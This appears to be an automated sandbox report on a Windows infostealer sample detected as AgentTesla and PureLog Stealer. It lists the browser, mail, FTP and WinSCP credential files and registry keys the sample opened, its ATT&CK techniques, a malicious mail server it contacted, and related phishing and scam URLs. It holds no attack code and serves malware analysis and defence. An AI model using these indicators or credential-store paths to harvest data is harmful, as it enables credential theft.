Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7404, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7404, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7404, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	421 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	151 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	151 Virtualization/Sandbox Evasion	1 Credentials in Registry	1 Application Window Discovery	SMB/Windows Admin Shares	11 Archive Collected Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	2 Data from Local System	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	26%	Virustotal		Browse
SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
mail.nationalkham.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://mail.nationalkham.com	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
http://mail.nationalkham.com	0%	Virustotal		Browse
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.nationalkham.com	192.185.35.67	true	true	0%, Virustotal, Browse	unknown
api.ipify.org	104.26.12.205	true	false		high
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://account.dyn.com/	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688552621.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.nationalkham.com	RegSvcs.exe, 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	RegSvcs.exe, 00000002.00000002.4135337637.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
192.185.35.67	mail.nationalkham.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431452
Start date and time:	2024-04-25 07:16:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 77 Number of non-executed functions: 21
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:16:56	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe modified
07:16:57	API Interceptor	12562550x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	ip-api.com/json
	Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip	Get hash	malicious	Unknown	Browse	ip-api.com/json
	Swift Payment.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	SARL RABINEAU Order FA2495.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	ip-api.com/line/?fields=hosting
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	QUOTATION_APRQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	Umulighed.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
104.26.12.205	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	208.95.112.1
	Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip	Get hash	malicious	Unknown	Browse	208.95.112.1
	Swift Payment.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SARL RABINEAU Order FA2495.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	208.95.112.1
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Umulighed.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
api.ipify.org	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DHL Shipping doc.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	purchase order pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
mail.nationalkham.com	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.185.35.67
	QUOTE RNP002673CC1F68.pdf.exe	Get hash	malicious	AgentTesla	Browse	192.185.35.67
	PRODUCT LIST_002673CC1F68.pdf.exe	Get hash	malicious	AgentTesla	Browse	192.185.35.67
	SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe	Get hash	malicious	AgentTesla	Browse	192.185.35.67

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://decktop.us/gORiyf	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	https://ortelia.com/download-ortelia-curator/	Get hash	malicious	Havoc	Browse	1.1.1.1
	o7b91j8vnJ.exe	Get hash	malicious	LummaC	Browse	172.67.163.209
	http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.html	Get hash	malicious	HTMLPhisher	Browse	172.64.151.101
	https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.com	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
	https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238	Get hash	malicious	Phisher	Browse	104.21.80.104
	https://windowdefalerts-error0x21702-alert-virus-detected.pages.dev/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	172.66.44.98
	https://windowdefalerts-error0x21701-alert-virus-detected.pages.dev/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	104.21.56.41
	https://www.google.com.np/amp/s/www.google.com%2Furl%3Fsa%3DD%26q%3Dhttps%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fmy-awesome-project-id-35889.appspot.com%2Fo%2Fsos.html%253Falt%253Dmedia%2526token%253D8c2f5cb7-624d-469a-a987-a3c9e3bcaf1c%26ust%3D1714080900000000%26usg%3DAOvVaw34yUu7IQGPgWBmXhCFwzfl%26hl%3Den%26source%3Dgmail#Z2xlbm5Ab2JzaWRpYW5zZWN1cml0eS5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://ppo46-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0124	Get hash	malicious	TechSupportScam	Browse	172.67.208.186
UNIFIEDLAYER-AS-1US	http://pengoodet.live	Get hash	malicious	Unknown	Browse	69.89.24.98
	http://electricalsworksflorida.com/j6u	Get hash	malicious	HTMLPhisher	Browse	192.185.84.91
	https://gamma.app/docs/Shared-Document-9j9g6z8iqo1w0uu	Get hash	malicious	HTMLPhisher	Browse	192.185.97.246
	Total Invoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.185.129.60
	https://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	162.241.114.35
	http://keeper.com	Get hash	malicious	Unknown	Browse	192.185.65.45
	https://ken.fnh.temporary.site/wp-includes/sitemaps/update	Get hash	malicious	Unknown	Browse	192.185.46.79
	5RiFmXTOMp.elf	Get hash	malicious	Mirai	Browse	142.7.26.76
	SARL RABINEAU Order FA2495.exe	Get hash	malicious	AgentTesla	Browse	192.254.225.166
	https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ	Get hash	malicious	Unknown	Browse	67.20.113.11
TUT-ASUS	SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe	Get hash	malicious	Exela Stealer, Python Stealer	Browse	208.95.112.1
	Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip	Get hash	malicious	Unknown	Browse	208.95.112.1
	Swift Payment.bat	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SARL RABINEAU Order FA2495.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PURCHASE ORDER LIST GREEN VALLY CORP PDF.bat	Get hash	malicious	GuLoader	Browse	208.95.112.1
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Zapytanie ofertowe Fl#U00e4ktGroup 04232024.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Umulighed.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Database4.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse	104.26.12.205
	Control-Tributario_KFRCkzlbCHUSEBMRSECA.zip	Get hash	malicious	Unknown	Browse	104.26.12.205
